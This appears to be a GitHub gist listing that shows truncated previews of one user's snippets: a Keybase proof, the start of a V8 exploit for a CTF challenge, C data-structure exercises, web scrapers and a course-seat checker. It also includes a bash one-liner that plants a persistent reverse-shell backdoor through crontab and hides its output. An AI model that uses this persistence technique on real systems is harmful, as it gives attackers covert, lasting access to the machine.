I hereby claim:
- I am hoefler02 on github.
- I am hoefler02 (https://keybase.io/hoefler02) on keybase.
- I have a public key ASCWJupqufchMtBRl0JTnb2GTvgfQdtzjqb3Nh5BPqi6MQo
To claim this, I am signing this object:
/* | |
* V8 Exploitation | |
* Michael Hoefler | |
* Hitcon CTF 2022 - Hole | |
*/ | |
// https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/ | |
// Helper functions to convert between float and integer primitives | |
var buf = new ArrayBuffer(8); // 8 byte array buffer | |
var f64_buf = new Float64Array(buf); |
I hereby claim:
To claim this, I am signing this object:
#include <stdio.h> | |
#include <stdlib.h> | |
#include <time.h> | |
// November 7 2020 | |
// More Data Structures | |
// Hash Table Implementation | |
#define TABLE_SIZE 1009 |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <time.h> | |
// November 7 2020 | |
// Data Structure Fun | |
// Linked List Implementation | |
typedef struct node { | |
int val; |
#!/usr/bin/env python3 | |
""" | |
This is a script to query the WVU course listing, checking for seat openings. | |
CRN refers to "course reference number", which is found by visiting | |
courses.wvu.edu. Term is passed as a string (eg. "Fall 2020"), and is converted | |
to a numeric code which is used to query for the desired course. Enjoy! | |
""" | |
from config import account_sid, auth_token, send_number, recieve_number, crn, term |
# Scrapes MCS staff data from public directory | |
# Used for MHS-Protect app project | |
import requests, time, json | |
from bs4 import BeautifulSoup | |
people = [] | |
file = open('people.json', 'w') |
# Schoology Web Scraper | |
# Pulls grades from https://schoology.com | |
from bs4 import BeautifulSoup | |
import requests | |
response = requests.get('https://schoology.com/grades/grades', headers={'cookie': 'your_cookie_goes_here'}) | |
soup = BeautifulSoup(response.content, 'html.parser') | |
grades = [] |
#!/bin/bash | |
while true | |
do | |
eject | |
sleep 300 | |
done | |
# use at your own risk :) |
#!/bin/bash | |
# persistent reverse shell backdoor via crontab | |
# overwrites existing crontabs | |
(touch .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1 | |
# keeps existing crontabs | |
(crontab -l > .tab ; echo "* * * * * reverse-shell-of-choice" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1 |